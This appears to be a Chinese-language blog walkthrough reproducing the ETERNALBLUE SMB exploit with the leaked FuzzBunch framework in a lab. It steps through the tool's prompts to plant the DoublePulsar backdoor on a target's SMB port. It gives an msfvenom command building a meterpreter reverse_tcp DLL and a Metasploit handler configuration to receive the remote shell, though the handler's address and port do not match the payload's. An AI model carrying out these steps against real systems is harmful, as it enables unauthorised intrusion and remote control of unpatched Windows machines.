方程式0day ETERNALBLUE 复现过程

环境:

  • python-2.6.6.msi
    https://www.python.org/download/releases/2.6.6/
  • pywin32-221.win32-py2.6.exe
    https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

去github上把需要脚本下载下来,解压到桌面上,然后设置python的环境变量,再运行fb.py,再次之前要在当前目录下配置一个名为listeningposts的目录,否则会报错

  • 成功执行fb.py的界面为


    图片.png

-首先会让你输入目标机器的ip地址;本地ip


图片.png
  • 询问是否重定向,选否
图片.png
  • 选择基本日志目录,输入no(由于我这里已经复现过一次,所以这里显示有test)


    图片.png

-这里我直接选择0进入test,如果没有test项目,可以选择另一个创建一个新的项目

图片.png
  • 然后下一步就默认回车
图片.png
  • 使用永恒之蓝的模块
图片.png
  • 下面的默认回车


    1.png

    2.png
  • 选择目标机器的系统,选择1

图片.png
  • 选择fuzzbunch
图片.png
  • 然后下面几个默认回车
图片.png
  • 在目标机器对应的SMB端口植入一个名为DoublePulsar的后门程序
图片.png
  • 然后默认回车。。。
图片.png
  • 下面的这个选择 SMB,再下面的选择操作系统版本这里选择64位
图片.png
  • 下一步选择 运行全部 2


    图片.png

接下来需要从kali中生成一个.dll的payload,供其使用,将生成出来的dll放到攻击机win7下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.119 LPORT=4444 -f dll > s.dll
图片.png
  • 然后把生成的dll文件导入到工具中


    图片.png
  • 然后又是默认敲回车

图片.png
图片.png
  • 接下来去kali里面配置msf
use exploit/multi/handler
set LHOST 192.168.11.122
set LPORT 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

之后就可以坐等shell上门啦

你可能感兴趣的:(方程式0day ETERNALBLUE 复现过程)